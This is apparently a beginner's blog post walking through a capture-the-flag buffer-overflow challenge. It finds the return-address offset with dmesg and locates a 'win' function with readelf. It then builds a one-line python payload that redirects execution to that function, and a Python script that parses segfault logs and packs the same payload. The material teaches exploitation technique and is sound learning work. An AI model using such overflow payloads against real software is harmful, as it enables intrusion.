Getting Started with PWN 2.0

AGS
3 min read, Apr 26, 2021

If you missed PWN 1.0, here you go: Click Here

Continuing from PWN 1.0, here we take another CTF challenge and solve it.
Let's PWN :)

We are given a binary (handshake) and we need to pwn it.

Let's try to find an overflow here!

Hmmm, there is an overflow.

Now our task is to find the buffer size, so that we can make the instruction pointer (ip) point to a custom address.

Hmmm, so somewhere between 32 and 50.

So we got it right: 40 should be the buffer size. Now, to check the instruction pointer, we can use dmesg, which examines the kernel ring buffer.

Check the last one: ip is at 0x00000000000007d4, but we still didn't get our 41 (i.e. the hex of 'A') into the ip, so we must increase our input so that the buffer overwrites the ip.

So with 48 A's we can see that our ip points to 0x0000000041414141.
So 44 A's followed by the payload must work.
But where should we point our ip?
Here I am introducing you to readelf (readelf displays information about one or more ELF format object files).

So this has function addresses, objects, etc.
Let's do some grep:

readelf -s <binary> | grep -i "FUNC"

Analyzing the functions, we can see that there is a function called win (line 64, with address 0x080491c2), so our aim is to point the ip to that function in order to get the flag.
So let's pack it now :)

Payload

python -c "print 'A'*44 + '\xc2\x91\x04\x08'" | ./handshake

We made it, right!
Let's hack together :)
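The same reasoning as above (reading the faulting ip out of a dmesg segfault line, checking that it is made of our fill byte, deriving the 44-byte offset from the 48-byte input, and packing the win address in little-endian order) as a Python 3 script. This is an added example, not code from the original post; the dmesg lines, pid and sp values are constructed samples, and only the 0x41414141 ip and 0x080491c2 win address come from the walkthrough.

```python
import re
import struct

# Constructed dmesg lines in the shape the kernel prints for an x86 segfault.
# Timestamps, pids and sp values are made up; the ip values mirror the post.
SAMPLE_DMESG = """\
[ 1234.5678] handshake[4242]: segfault at 7d4 ip 00000000000007d4 sp 00000000ffffd3a0 error 14 in handshake[8048000+1000]
[ 1240.1111] handshake[4250]: segfault at 41414141 ip 0000000041414141 sp 00000000ffffd3a0 error 14 in handshake[8048000+1000]
"""

SEGFAULT_RE = re.compile(
    r"(\S+)\[(\d+)\]: segfault at ([0-9a-f]+) ip ([0-9a-f]+) sp ([0-9a-f]+)"
)


def parse_segfaults(text):
    """Return (process, pid, fault_addr, ip, sp) tuples for each segfault line."""
    out = []
    for m in SEGFAULT_RE.finditer(text):
        proc, pid, at, ip, sp = m.groups()
        out.append((proc, int(pid), int(at, 16), int(ip, 16), int(sp, 16)))
    return out


def ip_is_fill_pattern(ip, fill=0x41, width=4):
    """True when the low `width` bytes of ip are all the fill byte (0x41414141):
    the signature of a saved return address overwritten by repeated 'A's."""
    return all(((ip >> (8 * i)) & 0xFF) == fill for i in range(width))


def return_address_offset(input_len, width=4):
    """Offset of the saved return address once `input_len` fill bytes cover it
    exactly: the last `width` bytes of the input landed in the ip slot."""
    return input_len - width


def build_payload(offset, target):
    """Pad up to the saved return address, then append target little-endian."""
    return b"A" * offset + struct.pack("<I", target)


if __name__ == "__main__":
    for proc, pid, _, ip, _ in parse_segfaults(SAMPLE_DMESG):
        print(f"{proc}[{pid}] ip={ip:#x} fill_pattern={ip_is_fill_pattern(ip)}")
    offset = return_address_offset(48)   # 48 A's fully covered the ip -> 44
    print(build_payload(offset, 0x080491C2))
```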

YouTube: https://youtube.com/programmingforfun
Instagram:
https://www.instagram.com/buff3r0verflow/

Have fun pwning them :)

AGS

Dev Dominus | Cyber security | Software Engineer